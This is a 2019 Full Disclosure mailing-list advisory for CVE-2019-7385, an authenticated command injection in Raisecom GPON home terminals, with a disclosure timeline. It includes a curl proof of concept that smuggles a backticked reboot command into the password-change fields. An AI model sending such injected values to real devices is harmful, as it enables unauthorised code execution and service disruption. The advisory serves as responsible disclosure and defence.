[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] KSA-Dev-006:CVE-2019-7385: Authenticated remote code execution on Multiple Raisecom GPON Device
From: Kingkaustubh via Fulldisclosure <fulldisclosure () seclists ! org>
Date: 2019-02-12 9:36:23
Message-ID: 1a3a40c7-93bd-06bc-322e-e6b3b625f0ba () me ! com
[Download RAW message or body]
=====================================
Authenticated Shell Command Injection
=====================================
. contents:: Table Of Content
Overview
========
Title:- Authenticated Shell command Injection
Author: Kaustubh G. Padwad
Vendor: Raisecom technology co.,LTD
Product: GPON-ONU HT803G-07 (could be more who shares the same codebase)
Potentially vulnerable
ISCOM HT803G-U
ISCOM HT803G-W
ISCOM HT803G-1GE
ISCOM HT803G
Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
Severity: High--Critical
Advisory ID
============
KSA-Dev-006
About the Product:
==================
The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential \
access services including high speed data, IPTV, voice and CATV services compliant with the \
ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, \
voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage \
connections for various application scenarios, such as residential triple-play service and \
business connections. The GPON ONT series offer flexible choices in terms of downlink types and \
numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi \
function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end \
management and monitoring functionality, and the GPON series can be managed under the Raisecom \
NView platform.
Description:
============
An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, \
HT803G-W, HT803G-1GE, and HT803G GPON products with thefirmware version \
ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below, The values of the newpass and confpass \
parameters in /bin/WebMGR are used in a system call in the firmware. Because there is no user \
input validation, this leads to authenticated code execution on the device.
[Additional_information]
The value of newpass and confpass in /bin/WebMGR parameter is parse to system call in the \
Firmware and since their is no user input validation this leads to authenticated code \
execution on device
Vulnerability Class:
====================
Authenticated Shell Command Injection
Attack Type
===========
Local
Impact Code execution
=====================
true
Attack Vectors
==============
TO exploit this vulnerability one needs to parse the correct request to the device or they one \
needs to visit the crafted Page
How to Reproduce: (POC):
========================
curl -i -s -k -X 'POST' \
-H 'Origin: http://192.168.1.1' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: \
application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) \
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: \
http://192.168.1.1/password.asp' \
--data-binary $'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN' \
\ 'http://192.168.1.1/boaform/formPasswordSetup'
Mitigation
==========
This issue is fixed in latest firmware as per vendor.
Disclosure:
===========
28-NOV-2018 Discoverd the Vulnerability
28-NOV-2018 Reported to vendor
10-Dec-2018 Recived confirmation from vendor regarding fix
05-JAN-2019 Request for the CVE-ID
04-FEB-2019 CVE Assigned
credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic